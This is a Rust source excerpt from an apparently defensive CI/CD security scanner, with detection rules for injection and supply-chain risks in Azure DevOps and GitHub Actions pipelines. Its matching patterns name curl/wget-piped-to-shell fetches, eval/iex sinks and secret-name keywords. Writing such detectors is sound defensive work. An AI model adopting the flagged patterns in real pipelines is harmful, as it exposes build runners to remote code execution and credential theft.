2736/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
2737/// expansion, a 2-step injection chain.
2738///
2739/// **Phase 1 (capture step):** an inline ADO script body
2740/// (`META_SCRIPT_BODY`) that contains BOTH:
2741///   - a "terraform output capture" signal — either a literal `terraform
2742///     output` CLI invocation (with or without `-raw <name>` / `-json`),
2743///     OR a reference to a `TF_OUT_*` env var (the standard naming
2744///     convention for env vars sourced from a `TerraformCLI@*`
2745///     `command: output` task), AND
2746///   - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
2747///
2748/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
2749/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
2750/// shell-expansion position, where "shell-expansion position" is any of:
2751///   - inside `bash -c "..."` / `bash -c '...'`
2752///   - inside `eval "..."` / `eval '...'` / `eval $(...)`
2753///   - inside command substitution `$(... $(NAME) ...)`
2754///   - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
2755///     in the same script
2756///   - bare unquoted `$(NAME)` as a command word (line-leading)
2757///
2758/// **Severity: High.** Terraform state/outputs are often controlled by
2759/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
2760/// access controls than the pipeline itself. The `task.setvariable` hop
2761/// launders attacker-controlled state through pipeline-variable space —
2762/// existing rules see only the in-step view.
2763pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
2764    // Step 0: collect every Step (in graph insertion order, which matches
2765    // YAML order) that carries a non-empty script body. Group by job name.
2766    struct StepInfo<'a> {
2767        id: NodeId,
2768        name: &'a str,
2769        body: &'a str,
2770    }
2771    let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
2772        std::collections::BTreeMap::new();
2773    for step in graph.nodes_of_kind(NodeKind::Step) {
2774        let body = match step.metadata.get(META_SCRIPT_BODY) {
2775            Some(b) if !b.is_empty() => b.as_str(),
2776            _ => continue,
2777        };
2778        let job = step
2779            .metadata
2780            .get(META_JOB_NAME)
2781            .map(String::as_str)
2782            .unwrap_or("");
2783        by_job.entry(job).or_default().push(StepInfo {
2784            id: step.id,
2785            name: step.name.as_str(),
2786            body,
2787        });
2788    }
2789
2790    let mut findings = Vec::new();
2791
2792    for (_job_name, steps) in by_job.iter() {
2793        // Phase 1: scan every step in this job for capture+setvariable.
2794        // Each capture step yields zero-or-more (variable_name) outputs.
2795        let captures: Vec<(usize, Vec<String>)> = steps
2796            .iter()
2797            .enumerate()
2798            .filter_map(|(idx, s)| {
2799                let vars = capture_phase_variables(s.body);
2800                if vars.is_empty() {
2801                    None
2802                } else {
2803                    Some((idx, vars))
2804                }
2805            })
2806            .collect();
2807
2808        if captures.is_empty() {
2809            continue;
2810        }
2811
2812        // Phase 2: for each capture step, look at all later steps in the
2813        // same job. For each later step, find any captured variable name
2814        // whose `$(NAME)` reference appears in shell-expansion position
2815        // within that later step's body.
2816        for (cap_idx, vars) in &captures {
2817            for later_idx in (cap_idx + 1)..steps.len() {
2818                let sink = &steps[later_idx];
2819                let mut hits: Vec<&str> = Vec::new();
2820                for var in vars {
2821                    if expansion_in_shell_position(sink.body, var) {
2822                        hits.push(var.as_str());
2823                    }
2824                }
2825                if hits.is_empty() {
2826                    continue;
2827                }
2828                hits.sort();
2829                hits.dedup();
2830                let cap = &steps[*cap_idx];
2831                let names = hits.join(", ");
2832                findings.push(Finding {
2833                    severity: Severity::High,
2834                    category:
2835                        FindingCategory::TerraformOutputViaSetvariableShellExpansion,
2836                    path: None,
2837                    nodes_involved: vec![cap.id, sink.id],
2838                    message: format!(
2839                        "Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
2840                        cap.name,
2841                        names,
2842                        sink.name,
2843                        hits[0],
2844                    ),
2845                    recommendation: Recommendation::Manual {
2846                        action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
2847                    },
2848                    source: FindingSource::BuiltIn,
2849                    extras: FindingExtras::default(),
2850                });
2851            }
2852        }
2853    }
2854
2855    findings
2856}
2857
2858/// Phase-1 helper: given an inline-script body, return the list of
2859/// pipeline-variable names that the body sets via
2860/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
2861/// contains a "terraform output capture" signal.
2862///
2863/// We do not attempt to data-flow-link the captured value to the
2864/// `setvariable` directive — the proximity within a single inline script
2865/// is the operative signal. The two corpus exemplars
2866/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
2867/// capture and the setvariable inside the same PowerShell block.
2868fn capture_phase_variables(body: &str) -> Vec<String> {
2869    if !body_has_terraform_output_capture(body) {
2870        return Vec::new();
2871    }
2872    setvariable_names_in(body)
2873}
2874
2875/// True iff the body contains a terraform-output capture signal.
2876fn body_has_terraform_output_capture(body: &str) -> bool {
2877    // Literal CLI invocation, with or without subcommand args. We check
2878    // case-sensitive because terraform CLI is always lowercase.
2879    if body.contains("terraform output") {
2880        return true;
2881    }
2882    // Env-var convention used by the `TerraformCLI@*` task family
2883    // (`command: output` writes results into `TF_OUT_<name>` env vars
2884    // surfaced into the next step). PowerShell form: `$env:TF_OUT_X`.
2885    // POSIX form: `$TF_OUT_X` or `${TF_OUT_X}`.
2886    if body.contains("$env:TF_OUT_") || body.contains("${env:TF_OUT_") {
2887        return true;
2888    }
2889    // POSIX shell. Use a manual scan — we want to match `$TF_OUT_X` and
2890    // `${TF_OUT_X}` but avoid matching arbitrary substrings like
2891    // `MY_TF_OUT_X` that aren't a variable expansion.
2892    for marker in ["$TF_OUT_", "${TF_OUT_"] {
2893        if body.contains(marker) {
2894            return true;
2895        }
2896    }
2897    false
2898}
2899
2900/// Extract the variable names set by every
2901/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
2902/// Tolerates whitespace and either `;` or `]` as the variable= terminator.
2903fn setvariable_names_in(body: &str) -> Vec<String> {
2904    let needle = "##vso[task.setvariable variable=";
2905    let mut out: Vec<String> = Vec::new();
2906    let mut cursor = 0;
2907    while let Some(rel) = body[cursor..].find(needle) {
2908        let start = cursor + rel + needle.len();
2909        let tail = &body[start..];
2910        let end = tail
2911            .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
2912            .unwrap_or(tail.len());
2913        let name = tail[..end].trim().to_string();
2914        if !name.is_empty()
2915            && name
2916                .chars()
2917                .all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.')
2918        {
2919            out.push(name);
2920        }
2921        cursor = start + end;
2922    }
2923    out.sort();
2924    out.dedup();
2925    out
2926}
2927
2928/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
2929/// position? "Shell-expansion position" means the value will be parsed by
2930/// a shell or PowerShell interpreter at runtime, rather than being fed
2931/// into a function/cmdlet that quotes its arguments.
2932fn expansion_in_shell_position(body: &str, name: &str) -> bool {
2933    let needle = format!("$({name})");
2934    if !body.contains(&needle) {
2935        return false;
2936    }
2937    // Cheap whole-body checks: if the script contains any of these
2938    // primitives anywhere, an interpolation of `$(name)` elsewhere in the
2939    // same script is at risk. The `sharedservice-solarwinds` corpus
2940    // exemplar exercises the `-split` + `Invoke-Command` + foreach branch
2941    // — all three signals fire.
2942    let sigil_set: &[&str] = &[
2943        "bash -c",
2944        "sh -c",
2945        "eval ",
2946        "Invoke-Expression",
2947        " iex ",
2948        "iex(",
2949        "iex (",
2950        "Invoke-Command",
2951        "-split",
2952    ];
2953    if sigil_set.iter().any(|s| body.contains(s)) {
2954        return true;
2955    }
2956    // Nested command substitution: `$(... $(name) ...)`. We look for any
2957    // `$(` occurring strictly before the first `$(name)` — ADO's
2958    // `$(macro)` and POSIX `$(cmd)` share the same surface syntax, but
2959    // any `$(` *outside* the `$(name)` itself, on the same line, indicates
2960    // the sink is being parsed inside another command substitution.
2961    for (line_no, line) in body.lines().enumerate() {
2962        let _ = line_no;
2963        if let Some(pos) = line.find(&needle) {
2964            // Search the prefix for an unclosed `$(`. Naive but adequate
2965            // for inline-script bodies (we don't attempt to balance).
2966            let prefix = &line[..pos];
2967            let opens = prefix.matches("$(").count();
2968            let closes = prefix.matches(')').count();
2969            if opens > closes {
2970                return true;
2971            }
2972        }
2973    }
2974    // Bare unquoted line-leading reference: `$(NAME) ...` with no
2975    // surrounding quotes — the value is parsed as a command line.
2976    for line in body.lines() {
2977        let trimmed = line.trim_start();
2978        if trimmed.starts_with(&needle) {
2979            // Skip the obvious assignment-to-variable forms that quote.
2980            // PowerShell `$x = "$(name)"` and POSIX `X="$(name)"` keep
2981            // the value out of the command position.
2982            return true;
2983        }
2984    }
2985    false
2986}
2987
2988/// Run all rules against a graph.
2989// ── runtime_script_fetched_from_floating_url ──────────────────
2990//
2991// Detect `run:` blocks that download a remote script from a non-pinned URL
2992// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
2993// vector — neither `unpinned_action` (which inspects `uses:`) nor
2994// `floating_image` (containers) covers it.
2995//
2996// Detection primitive (URL must be both):
2997//   1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
2998//      `bash <(curl …)`, or `deno run https://…`
2999//   2. URL is mutable: contains `refs/heads/`, `/main/`, `/master/`,
3000//      `/develop/`, `/HEAD/`, OR is a raw `git clone`/`fetch` from a
3001//      branch URL with no version pin.
3002//
3003// Severity: High (one upstream commit lands code on every consumer).
3004fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
3005    // Cheap pre-filter to keep the regex-free scan fast.
3006    let lower = body;
3007    let has_curl_or_wget = lower.contains("curl") || lower.contains("wget");
3008    let has_pipe_shell = lower.contains("| bash")
3009        || lower.contains("|bash")
3010        || lower.contains("| sh")
3011        || lower.contains("|sh")
3012        || lower.contains("<(curl")
3013        || lower.contains("<(wget");
3014    let has_deno_remote = lower.contains("deno run http://") || lower.contains("deno run https://");
3015
3016    if !((has_curl_or_wget && has_pipe_shell) || has_deno_remote) {
3017        return false;
3018    }
3019
3020    // For each line that contains a fetch+pipe or a deno-remote run, check
3021    // whether the URL on that line is mutable.
3022    for line in body.lines() {
3023        let line_has_pipe_shell = line.contains("| bash")
3024            || line.contains("|bash")
3025            || line.contains("| sh")
3026            || line.contains("|sh")
3027            || line.contains("<(curl")
3028            || line.contains("<(wget");
3029        let line_has_deno_remote =
3030            line.contains("deno run http://") || line.contains("deno run https://");
3031
3032        if !(line_has_pipe_shell || line_has_deno_remote) {
3033            continue;
3034        }
3035
3036        if line_url_is_mutable(line) {
3037            return true;
3038        }
3039    }
3040    false
3041}
3042
3043fn line_url_is_mutable(line: &str) -> bool {
3044    // Mutable URL markers.
3045    const MUTABLE_PATHS: &[&str] = &[
3046        "refs/heads/",
3047        "/HEAD/",
3048        "/main/",
3049        "/master/",
3050        "/develop/",
3051        "/trunk/",
3052        "/latest/",
3053    ];
3054    for marker in MUTABLE_PATHS {
3055        if line.contains(marker) {
3056            return true;
3057        }
3058    }
3059    // Bare `raw.githubusercontent.com/<owner>/<repo>/<ref>/...` where <ref>
3060    // is the literal `main`/`master` segment was caught above. We could be
3061    // looser and flag any URL with no version-like segment, but that
3062    // sacrifices precision — the marker list above is the conservative core.
3063    false
3064}
3065
3066/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
3067/// the URL is pinned to a mutable branch ref. The remote host's branch tip
3068/// becomes a write-anywhere primitive on the runner.
3069///
3070/// Severity: High.
3071pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
3072    let mut findings = Vec::new();
3073
3074    for step in graph.nodes_of_kind(NodeKind::Step) {
3075        let body = match step.metadata.get(META_SCRIPT_BODY) {
3076            Some(b) if !b.is_empty() => b,
3077            _ => continue,
3078        };
3079
3080        if !body_has_pipe_to_shell_with_floating_url(body) {
3081            continue;
3082        }
3083
3084        findings.push(Finding {
3085            severity: Severity::High,
3086            category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
3087            path: None,
3088            nodes_involved: vec![step.id],
3089            message: format!(
3090                "Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
3091                step.name
3092            ),
3093            recommendation: Recommendation::Manual {
3094                action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
3095            },
3096            source: FindingSource::BuiltIn,
3097                extras: FindingExtras::default(),
3098});
3099    }
3100
3101    findings
3102}
3103
3104// ── pr_trigger_with_floating_action_ref ────────────────────────
3105//
3106// Detect the high-severity conjunction: workflow runs in privileged base-repo
3107// context (`pull_request_target` / `issue_comment` / `workflow_run`) AND uses
3108// at least one action by mutable ref (not SHA). Either condition alone is a
3109// finding from another rule; the conjunction is critical because the trigger
3110// grants write-token authority *and* the floating action lets an attacker
3111// substitute the executed code.
3112fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
3113    // META_TRIGGER may be a single trigger or a comma-separated list.
3114    trigger.split(',').any(|t| {
3115        let t = t.trim();
3116        matches!(t, "pull_request_target" | "issue_comment" | "workflow_run")
3117    })
3118}
3119
3120/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
3121///
3122/// Severity: Critical (full repo write token + attacker-controlled action code).
3123pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3124    let trigger = match graph.metadata.get(META_TRIGGER) {
3125        Some(t) => t.as_str(),
3126        None => return Vec::new(),
3127    };
3128    if !trigger_is_privileged_pr_class(trigger) {
3129        return Vec::new();
3130    }
3131
3132    let mut findings = Vec::new();
3133    let mut seen = std::collections::HashSet::new();
3134
3135    for image in graph.nodes_of_kind(NodeKind::Image) {
3136        // Skip first-party (local actions, self-hosted runner labels).
3137        if image.trust_zone == TrustZone::FirstParty {
3138            continue;
3139        }
3140        // Skip container images (covered by floating_image).
3141        if image
3142            .metadata
3143            .get(META_CONTAINER)
3144            .map(|v| v == "true")
3145            .unwrap_or(false)
3146        {
3147            continue;
3148        }
3149        // Skip self-hosted-runner Image nodes (those are FirstParty anyway,
3150        // but be defensive against future refactors).
3151        if image.metadata.contains_key(META_SELF_HOSTED) {
3152            continue;
3153        }
3154        // Already SHA-pinned (semantically valid) → safe.
3155        if is_pin_semantically_valid(&image.name) {
3156            continue;
3157        }
3158        // Dedupe per action reference.
3159        if !seen.insert(&image.name) {
3160            continue;
3161        }
3162
3163        findings.push(Finding {
3164            severity: Severity::Critical,
3165            category: FindingCategory::PrTriggerWithFloatingActionRef,
3166            path: None,
3167            nodes_involved: vec![image.id],
3168            message: format!(
3169                "Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
3170                image.name
3171            ),
3172            recommendation: Recommendation::PinAction {
3173                current: image.name.clone(),
3174                pinned: format!(
3175                    "{}@<sha256-digest>",
3176                    image.name.split('@').next().unwrap_or(&image.name)
3177                ),
3178            },
3179            source: FindingSource::BuiltIn,
3180                extras: FindingExtras::default(),
3181});
3182    }
3183
3184    findings
3185}
3186
3187// ── homoglyph_in_action_ref ──────────────────────────────────
3188//
3189// Detect `uses:` action references containing non-ASCII characters.
3190// Legitimate action references (owner/repo@ref) are purely ASCII.
3191// Non-ASCII characters indicate a possible Unicode confusable / homoglyph
3192// attack where a malicious action name visually impersonates a trusted one.
3193
3194/// Rule G2: action reference contains non-ASCII characters (possible homoglyph).
3195///
3196/// Iterates every `Image` node in the graph (which represent `uses:` action
3197/// refs) and flags any whose name contains at least one non-ASCII code point.
3198/// Severity: High — potential supply-chain impersonation attack.
3199pub fn check_homoglyph_in_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
3200    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
3201    if platform != Some("github-actions") {
3202        return Vec::new();
3203    }
3204
3205    let mut findings = Vec::new();
3206
3207    for image in graph.nodes_of_kind(NodeKind::Image) {
3208        if image.name.is_ascii() {
3209            continue;
3210        }
3211
3212        // Collect the offending non-ASCII characters for the message.
3213        let bad_chars: Vec<String> = image
3214            .name
3215            .chars()
3216            .filter(|c| !c.is_ascii())
3217            .map(|c| format!("U+{:04X} '{}'", c as u32, c))
3218            .collect();
3219        let char_list = bad_chars.join(", ");
3220
3221        findings.push(Finding {
3222            severity: Severity::High,
3223            category: FindingCategory::HomoglyphInActionRef,
3224            path: None,
3225            nodes_involved: vec![image.id],
3226            message: format!(
3227                "Action reference '{}' contains non-ASCII character(s) (possible homoglyph/confusable): {}",
3228                image.name, char_list
3229            ),
3230            recommendation: Recommendation::Manual {
3231                action: "Replace the action reference with the genuine ASCII action name. Verify the action owner/repo on github.com and ensure every character in the `uses:` field is plain ASCII.".into(),
3232            },
3233            source: FindingSource::BuiltIn,
3234            extras: FindingExtras::default(),
3235        });
3236    }
3237
3238    findings
3239}
3240
3241// ── untrusted_api_response_to_env_sink ────────────────────────
3242//
3243// Detect `workflow_run` consumer workflows that capture an external API
3244// response (gh CLI, curl against api.github.com) and write it into the GHA
3245// environment file. A poisoned API field (branch name, PR title, commit
3246// message) injects environment variables into every subsequent step in the
3247// same job.
3248fn body_writes_api_response_to_env_sink(body: &str) -> bool {
3249    // First, the sink: a redirect to one of the GHA gate files.
3250    let writes_env_sink = body.contains("$GITHUB_ENV")
3251        || body.contains("${GITHUB_ENV}")
3252        || body.contains("$GITHUB_OUTPUT")
3253        || body.contains("${GITHUB_OUTPUT}")
3254        || body.contains("$GITHUB_PATH")
3255        || body.contains("${GITHUB_PATH}");
3256    if !writes_env_sink {
3257        return false;
3258    }
3259
3260    // Then, an API source on the same body: gh CLI or a direct REST call.
3261    let calls_api = body.contains("gh pr view")
3262        || body.contains("gh pr list")
3263        || body.contains("gh api ")
3264        || body.contains("gh issue view")
3265        || body.contains("api.github.com");
3266    if !calls_api {
3267        return false;
3268    }
3269
3270    // Tier-1 precision: same-line conjunction (the canonical case in corpus,
3271    // e.g. `gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`).
3272    let lines: Vec<&str> = body.lines().collect();
3273    for line in &lines {
3274        let line_calls_api = line.contains("gh pr view")
3275            || line.contains("gh pr list")
3276            || line.contains("gh api ")
3277            || line.contains("gh issue view")
3278            || line.contains("api.github.com");
3279        let line_writes_sink = line.contains("$GITHUB_ENV")
3280            || line.contains("${GITHUB_ENV}")
3281            || line.contains("$GITHUB_OUTPUT")
3282            || line.contains("${GITHUB_OUTPUT}")
3283            || line.contains("$GITHUB_PATH")
3284            || line.contains("${GITHUB_PATH}");
3285        if line_calls_api && line_writes_sink {
3286            return true;
3287        }
3288    }
3289
3290    // Tier-2 precision: API call captures into a variable, and a *nearby*
3291    // line redirects that same variable to the env sink. Without dataflow,
3292    // we approximate "nearby" as: an API line and a sink line within 6 lines
3293    // of each other. This catches multi-step capture-then-write idioms while
3294    // keeping false-positive risk acceptable.
3295    let mut last_api_line: Option<usize> = None;
3296    for (i, line) in lines.iter().enumerate() {
3297        let line_calls_api = line.contains("gh pr view")
3298            || line.contains("gh pr list")
3299            || line.contains("gh api ")
3300            || line.contains("gh issue view")
3301            || line.contains("api.github.com");
3302        if line_calls_api {
3303            last_api_line = Some(i);
3304        }
3305        let line_writes_sink = line.contains("$GITHUB_ENV")
3306            || line.contains("${GITHUB_ENV}")
3307            || line.contains("$GITHUB_OUTPUT")
3308            || line.contains("${GITHUB_OUTPUT}")
3309            || line.contains("$GITHUB_PATH")
3310            || line.contains("${GITHUB_PATH}");
3311        if line_writes_sink {
3312            if let Some(api_idx) = last_api_line {
3313                if i.saturating_sub(api_idx) <= 6 {
3314                    return true;
3315                }
3316            }
3317        }
3318    }
3319
3320    false
3321}
3322
3323/// Rule: workflow_run-triggered workflow writes an API response value to the
3324/// GHA environment gate. Branch name / PR title in the response can carry
3325/// newline-injected env-var assignments.
3326///
3327/// Severity: High.
3328pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
3329    let trigger = match graph.metadata.get(META_TRIGGER) {
3330        Some(t) => t.as_str(),
3331        None => return Vec::new(),
3332    };
3333    let trigger_in_scope = trigger.split(',').any(|t| {
3334        let t = t.trim();
3335        matches!(t, "workflow_run" | "pull_request_target" | "issue_comment")
3336    });
3337    if !trigger_in_scope {
3338        return Vec::new();
3339    }
3340
3341    let mut findings = Vec::new();
3342
3343    for step in graph.nodes_of_kind(NodeKind::Step) {
3344        let body = match step.metadata.get(META_SCRIPT_BODY) {
3345            Some(b) if !b.is_empty() => b,
3346            _ => continue,
3347        };
3348
3349        if !body_writes_api_response_to_env_sink(body) {
3350            continue;
3351        }
3352
3353        findings.push(Finding {
3354            severity: Severity::High,
3355            category: FindingCategory::UntrustedApiResponseToEnvSink,
3356            path: None,
3357            nodes_involved: vec![step.id],
3358            message: format!(
3359                "Step '{}' captures a GitHub API response (gh CLI or api.github.com) into the GHA env gate ($GITHUB_ENV/$GITHUB_OUTPUT/$GITHUB_PATH) under trigger '{trigger}' — attacker-influenced fields (branch name, PR title) can inject environment variables for every subsequent step in the same job",
3360                step.name
3361            ),
3362            recommendation: Recommendation::Manual {
3363                action: "Validate the API field with a strict regex before redirecting (e.g. only `[0-9]+` for a PR number), or write only known-numeric fields. Never pipe free-form fields like branch name or PR title directly into $GITHUB_ENV.".into(),
3364            },
3365            source: FindingSource::BuiltIn,
3366            extras: FindingExtras::default(),
3367        });
3368    }
3369
3370    findings
3371}
3372
3373// ── pr_build_pushes_image_with_floating_credentials ────────────
3374//
3375// Detect: workflow triggered by a PR-class event uses a container-registry
3376// login action that is NOT SHA-pinned. The login action receives credentials
3377// (OIDC token or static registry secret) — a compromise of the action's
3378// branch lets an attacker exfiltrate them.
3379fn is_registry_login_action(action: &str) -> bool {
3380    let bare = action.split('@').next().unwrap_or(action);
3381    matches!(
3382        bare,
3383        "docker/login-action"
3384            | "aws-actions/amazon-ecr-login"
3385            | "aws-actions/configure-aws-credentials"
3386            | "azure/docker-login"
3387            | "azure/login"
3388            | "google-github-actions/auth"
3389            | "google-github-actions/setup-gcloud"
3390    ) || bare.ends_with("/login-to-gar")
3391        || bare.ends_with("/dockerhub-login")
3392        || bare.ends_with("/login-to-ecr")
3393        || bare.ends_with("/login-to-acr")
3394}
3395
3396fn trigger_includes_pull_request(trigger: &str) -> bool {
3397    trigger.split(',').any(|t| {
3398        let t = t.trim();
3399        // Match `pull_request` and `pull_request_target` — both are PR-class.
3400        t == "pull_request" || t == "pull_request_target"
3401    })
3402}
3403
3404/// Rule: PR-triggered workflow uses a non-SHA-pinned container-registry login
3405/// action. Compound vector: floating action holds registry creds + PR-controlled
3406/// image content reaches a shared registry.
3407///
3408/// Severity: High.
3409pub fn pr_build_pushes_image_with_floating_credentials(graph: &AuthorityGraph) -> Vec<Finding> {
3410    let trigger = match graph.metadata.get(META_TRIGGER) {
3411        Some(t) => t.as_str(),
3412        None => return Vec::new(),
3413    };
3414    if !trigger_includes_pull_request(trigger) {
3415        return Vec::new();
3416    }
3417
3418    let mut findings = Vec::new();
3419    let mut seen = std::collections::HashSet::new();
3420
3421    for image in graph.nodes_of_kind(NodeKind::Image) {
3422        if image.trust_zone == TrustZone::FirstParty {
3423            continue;
3424        }
3425        if image
3426            .metadata
3427            .get(META_CONTAINER)
3428            .map(|v| v == "true")
3429            .unwrap_or(false)
3430        {
3431            continue;
3432        }
3433        if !is_registry_login_action(&image.name) {
3434            continue;
3435        }
3436        if is_pin_semantically_valid(&image.name) {
3437            continue;
3438        }
3439        if !seen.insert(&image.name) {
3440            continue;
3441        }
3442
3443        findings.push(Finding {
3444            severity: Severity::High,
3445            category: FindingCategory::PrBuildPushesImageWithFloatingCredentials,
3446            path: None,
3447            nodes_involved: vec![image.id],
3448            message: format!(
3449                "PR-triggered workflow ('{trigger}') uses unpinned registry-login action '{}' — a compromise of that action's branch exfiltrates registry credentials or OIDC tokens, and any PR-controlled image content then reaches a shared registry",
3450                image.name
3451            ),
3452            recommendation: Recommendation::PinAction {
3453                current: image.name.clone(),
3454                pinned: format!(
3455                    "{}@<sha256-digest>",
3456                    image.name.split('@').next().unwrap_or(&image.name)
3457                ),
3458            },
3459            source: FindingSource::BuiltIn,
3460            extras: FindingExtras::default(),
3461        });
3462    }
3463
3464    findings
3465}
3466
3467/// Rule: ADO `##vso[task.setvariable]` with a sensitive-named variable
3468/// that omits `issecret=true` (either `issecret=false` or no `issecret`
3469/// flag at all). Without the flag the variable value is printed in
3470/// plaintext to the pipeline log and is not masked in downstream step
3471/// output.
3472///
3473/// Detection (per Step):
3474///   * `META_PLATFORM == "azure-devops"` (gates GHA/GitLab out)
3475///   * Step carries a non-empty `META_SCRIPT_BODY`
3476///   * Body contains `##vso[task.setvariable variable=NAME ...]` where
3477///     NAME (case-insensitive) matches a sensitive keyword: `password`,
3478///     `passwd`, `token`, `secret`, `key`, `credential`, `cert`,
3479///     `apikey`, `auth`
3480///   * The directive does NOT contain `issecret=true` (case-insensitive)
3481///     between `variable=NAME` and the closing `]`
3482///
3483/// Severity: High.
3484pub fn setvariable_issecret_false(graph: &AuthorityGraph) -> Vec<Finding> {
3485    if !graph_is_platform(graph, "azure-devops") {
3486        return Vec::new();
3487    }
3488
3489    const SENSITIVE_KEYWORDS: &[&str] = &[
3490        "password",
3491        "passwd",
3492        "token",
3493        "secret",
3494        "key",
3495        "credential",
3496        "cert",
3497        // "api_key" omitted: tokenizer splits on '_', so this keyword can never
3498        // match a single token — "key" already covers AZURE_API_KEY etc.
3499        "apikey",
3500        "auth",
3501    ];
3502
3503    let needle = "##vso[task.setvariable variable=";
3504
3505    let mut findings = Vec::new();
3506
3507    for step in graph.nodes_of_kind(NodeKind::Step) {
3508        let body = match step.metadata.get(META_SCRIPT_BODY) {
3509            Some(b) if !b.trim().is_empty() => b,
3510            _ => continue,
3511        };
3512
3513        let lower = body.to_lowercase();
3514        let mut cursor = 0;
3515
3516        while let Some(rel) = lower[cursor..].find(needle) {
3517            let start = cursor + rel + needle.len();
3518            let tail = &lower[start..];
3519
3520            // Extract variable name (terminated by `;`, `]`, or whitespace).
3521            let name_end = tail
3522                .find(|c: char| c == ';' || c == ']' || c.is_whitespace())
3523                .unwrap_or(tail.len());
3524            let var_name = &tail[..name_end];
3525
3526            if var_name.is_empty() {
3527                cursor = start + name_end;
3528                continue;
3529            }
3530
3531            // Token-split on `_`/`-` so "key" matches STORAGE_ACCOUNT_KEY but not "keyvaultname".
3532            let is_sensitive = var_name
3533                .split(['_', '-'])
3534                .any(|tok| SENSITIVE_KEYWORDS.contains(&tok));
3535
3536            if !is_sensitive {
3537                cursor = start + name_end;
3538                continue;
3539            }
3540
3541            // Grab the rest of the directive up to `]` to check for issecret.
3542            let directive_end = tail.find(']').unwrap_or(tail.len());
3543            let directive_tail = &tail[..directive_end];
3544            let has_issecret_true = directive_tail.contains("issecret=true");
3545
3546            if !has_issecret_true {
3547                // Recover the original-case variable name from the body.
3548                let orig_name = &body[start..start + name_end];
3549
3550                findings.push(Finding {
3551                    severity: Severity::High,
3552                    category: FindingCategory::SetvariableIssecretFalse,
3553                    path: None,
3554                    nodes_involved: vec![step.id],
3555                    message: format!(
3556                        "ADO setvariable with sensitive name '{}' uses issecret=false or omits issecret flag, value printed in plaintext logs",
3557                        orig_name,
3558                    ),
3559                    recommendation: Recommendation::Manual {
3560                        action: format!(
3561                            "Add `issecret=true` to the setvariable directive: `##vso[task.setvariable variable={};issecret=true]`",
3562                            orig_name,
3563                        ),
3564                    },
3565                    source: FindingSource::BuiltIn,
3566                    extras: FindingExtras::default(),
3567                });
3568            }
3569
3570            cursor = start + name_end;
3571        }
3572    }
3573
3574    findings
3575}
3576
3577pub fn run_all_rules(graph: &AuthorityGraph, max_hops: usize) -> Vec<Finding> {
3578    let mut findings = Vec::new();
3579    // MVP rules
3580    findings.extend(authority_propagation(graph, max_hops));
3581    findings.extend(over_privileged_identity(graph));
3582    findings.extend(unpinned_action(graph));
3583    findings.extend(untrusted_with_authority(graph));
3584    findings.extend(artifact_boundary_crossing(graph));
3585    // Stretch rules
3586    findings.extend(long_lived_credential(graph));
3587    findings.extend(floating_image(graph));
3588    findings.extend(persisted_credential(graph));
3589    findings.extend(trigger_context_mismatch(graph));
3590    findings.extend(cross_workflow_authority_chain(graph));
3591    findings.extend(authority_cycle(graph));
3592    findings.extend(uplift_without_attestation(graph));
3593    findings.extend(self_mutating_pipeline(graph));
3594    findings.extend(checkout_self_pr_exposure(graph));
3595    findings.extend(variable_group_in_pr_job(graph));
3596    findings.extend(self_hosted_pool_pr_hijack(graph));
3597    findings.extend(shared_self_hosted_pool_no_isolation(graph));
3598    findings.extend(service_connection_scope_mismatch(graph));
3599    findings.extend(template_extends_unpinned_branch(graph));
3600    findings.extend(template_repo_ref_is_feature_branch(graph));
3601    findings.extend(vm_remote_exec_via_pipeline_secret(graph));
3602    findings.extend(short_lived_sas_in_command_line(graph));
3603    // ADO inline-script secret-leak rules
3604    findings.extend(secret_to_inline_script_env_export(graph));
3605    findings.extend(secret_materialised_to_workspace_file(graph));
3606    findings.extend(keyvault_secret_to_plaintext(graph));
3607    findings.extend(setvariable_issecret_false(graph));
3608    findings.extend(terraform_auto_approve_in_prod(graph));
3609    findings.extend(addspn_with_inline_script(graph));
